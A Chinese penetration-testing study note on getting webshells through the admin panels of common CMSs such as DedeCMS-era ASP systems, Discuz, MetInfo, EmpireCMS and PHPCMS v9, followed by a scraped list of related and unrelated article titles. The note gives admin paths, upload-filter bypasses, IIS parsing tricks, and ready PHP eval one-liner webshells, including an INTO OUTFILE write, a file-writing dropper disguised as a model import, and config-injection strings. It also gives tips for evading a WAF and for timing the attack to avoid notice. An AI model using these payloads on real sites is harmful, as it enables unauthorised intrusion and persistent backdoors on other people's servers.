常见cms

良精、科讯、动易、aspcms、dz

米拓cms、phpcms2008、帝国cms、phpv9

phpweb、dedecms

良精

方法:

1、数据库备份拿shell

上传图片——点击数据库备份——改为脚本格式——添加账号,讲一句话添加在用户名处——备份——改为脚本格式

2、双文件上传

3、配置插马

4、修改文件上传类型直接上传

科讯(用IE)

/admin/admin.asp   后台路径

1、利用解析漏洞

2、设置——网站基本信息设置——默认允许上传文件类型,将asp改为aaspsp(会将asp替换为空)

内容——图片添加——上传时改为aaspsp

设置——基本设置——其它选项——通用页面目录——html/a.asp/(目录解析)——标签——自定义静态标签——增加静态标签——插入一句话——自定义页面——生成一个页面,会在a.asp目录下

动易(学校,简单的企业)

在网站配置中插马——连接inc/config.asp文件

数据库备份

双文件上传

aspcms

界面风格——编辑模板/css文件(利用IIS6.0解析漏洞)——添加——文件系统——a.asp;html——内容插入一句话

拓展功能——幻灯片设置——插马

dz

uckey或利用插件上传(常见的网站discuz x2.5)

后台 admin.php或cu_server

站长——ucenter设置(通过配置插马,闭合拿shell)

站长——数据库备份(或短文件漏洞)

米拓cms

metinfo 5.3.18                   install/phpinfo.php——里面能找到网站根目录

后台         admin/index.php (上传图片马 包含文件)

后台——安全——数据库备份——下载——打开(txt)——在完整的一句话后面写入新的一句话(select “<?php @eval($_POST[A]);?>” into outfile ‘网站根目录,路径写成Linux路径’)——恢复(一般在晚上没有数据交互的时候再做)

权限要求很高

帝国cms

empircms-v6.6

127.0.0.1/e/install

后台:127.0.0.1/e/admin/index.php

后台——数据表与系统模型——管理数据表——管理系统表模型——导入系统模型(要导.mod的文件)——<?fputs(fopen(“cnm.php”,”w”),”<?eval(\$_POST[cmd];)?>”)?>保存为mod文件,文件名为aa.php.mod——记住导入的目录路径/e/admin/cnm.php

注意:导入时候可能会有waf,可以在脚本中加入免杀的一句话

phpv9

phpcms_v9.6.3_GBK

127.0.0.1/install

后台——界面——模板风格——详情列表——search——编辑插马

后台——phpsso——系统管理——ucenter配置——uc_config.php中 ‘);eval($_post[a]);#

后台——内容——专题         phpv9低权限拿shell

phpweb

dedecmd

渗透测试学习 二十三、常见cms拿shell的更多相关文章

  1. 渗透测试学习 二十二、getshell总结

    大纲   管理员权限拿shell 普通权限拿shell 常见cms拿shell 进后台主要是可以对网站前台的内容,样式等做操作,要改脚本的内容的权限只有在webshell的权限下才可以(某些情况除外) ...

  2. 渗透测试学习 二十九、kali安装,信息搜集,服务器扫描

    kali安装,信息搜集,服务器扫描 kali介绍 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统.由Offensive Security Ltd维护和资助.最先由 ...

  3. 渗透测试学习 二十、 其他漏洞汇总之PHP相关漏洞

    大纲: PHP相关漏洞 JSP相关漏洞 其他漏洞汇总 PHP相关漏洞 文件包含漏洞 php://input等伪协议利用 代码执行漏洞 变量覆盖漏洞 文件包含漏洞 程序开发人员一般会把重复使用的函数写到 ...

  4. 渗透测试学习 二、Windows基础

    系统目录  服务  端口  注册表  黑客常用DOS命令(在拿到shell时会用到) 一.  系统目录 Windows目录  系统的安装目录 System32àconfigàSAM文件  是用户密码的 ...

  5. 渗透测试学习 二十八、WAF绕过详解

    大纲: WAF防护原理讲解 目录扫描绕过WAF 手工注入绕过WAF sqlmap绕过WAF 编写salmap绕过WAF 过WAF一句话编写讲解 菜刀连接绕过WAF webshell上传绕过WAF 提权 ...

  6. 渗透测试学习 二十一、 JSP相关漏洞

    大纲 ST2漏洞  (Struts2) 反序列漏洞              网站容器,中间键 其他漏洞 Struts2漏洞 简介: Struts2是一个基于MVC设计模式的Web应用框架,它本质上相 ...

  7. 渗透测试学习 十三、 SQLmap使用详解

    SQLmap介绍 sqlmap是一个由python语言编写的开源的渗透测试工具,它主要是检测SQL注入漏洞,是一款功能强大的SQL漏洞检测利用工具. 他可以检测的数据库有:access.msSQL.M ...

  8. Kali Linux Web 渗透测试视频教程— 第十三课-密码破解

    Kali Linux Web 渗透测试— 第十三课-密码破解 文/玄魂 目录 Kali Linux Web 渗透测试— 第十三课-密码破解............................... ...

  9. 【渗透测试学习平台】 web for pentester -2.SQL注入

    Example 1 字符类型的注入,无过滤 http://192.168.91.139/sqli/example1.php?name=root http://192.168.91.139/sqli/e ...

随机推荐

  1. Xcode更新到10.0之后遇到的那些坑:

    1.之前不在一个文件里的图片可以重新,更新之后图片不能重名了. 2.之前的双击.h.m文件不能重新开出个界面了 3. 4. ...... 未完待续

  2. 【React Native】进阶指南之一(特定平台、图片加载、动画使用)

    一.特定平台代码 React Native提供了两种方法来区分平台: 使用Platform模块: 使用特定平台扩展名: 1.Platform模块 React Native提供了一个检测当前运行平台的模 ...

  3. html 初识 文档结构 常用标签

    HTML初识 △HTML: 超文本标记语言,是一种用于创建网页的标记语言,不是编程语言,没有逻辑 本质上是浏览器可识别的规则 我们按照规则写网页,浏览器根据规则渲染我们的网页.对于不同的浏览器,对同一 ...

  4. java8 的files、path类相关文件遍历API

    Path的两种初始化(应该还有别的方式) Path file = new File(path).toPath(); Paths.get 判断是文件.是目录 Files.isRegularFile(fi ...

  5. Leetcode 90. 子集 II

    地址  https://leetcode-cn.com/problems/subsets-ii/ 给定一个可能包含重复元素的整数数组 nums,返回该数组所有可能的子集(幂集). 说明:解集不能包含重 ...

  6. mybatis foreach方法遍历对象

    <delete id="deleteAppUserByIds">    delete from app_userinfo where     <foreach i ...

  7. hebust-fengyu

    三人行必有我师焉,择其善者而从之,其不善者而改之. 入则无法家拂士,出则无敌国外患者,国恒亡,然后知生于忧患而死于安乐也. 狡兔死走狗烹,飞鸟尽良弓藏,敌国尽谋臣亡 今齐地方千里,百二十城,宫妇左右莫 ...

  8. Paper | Adaptive Computation Time for Recurrent Neural Networks

    目录 1. 网络资源 2. 简介 3. 自适应运算时间 3.1 有限运算时间 3.2 误差梯度 1. 网络资源 这篇文章的写作太随意了,读起来不是很好懂(掺杂了过多的技术细节).因此有作者介绍会更好. ...

  9. Python爬虫教程-实现百度翻译

    使用python爬虫实现百度翻译功能python爬虫实现百度翻译: python解释器[模拟浏览器],发送[post请求],传入待[翻译的内容]作为参数,获取[百度翻译的结果] 通过开发者工具,获取发 ...

  10. 立足于运维与监控的前端框架 NoahV

    NoahV是一个致力于解决中后台前端效率问题的前端框架,立足于运维和监控的应用场景,使用当前前端最新的技术栈并结合团队在项目开发中的最佳实践从而推出的前端开发框架. NoahV提供的功能覆盖了从开发到 ...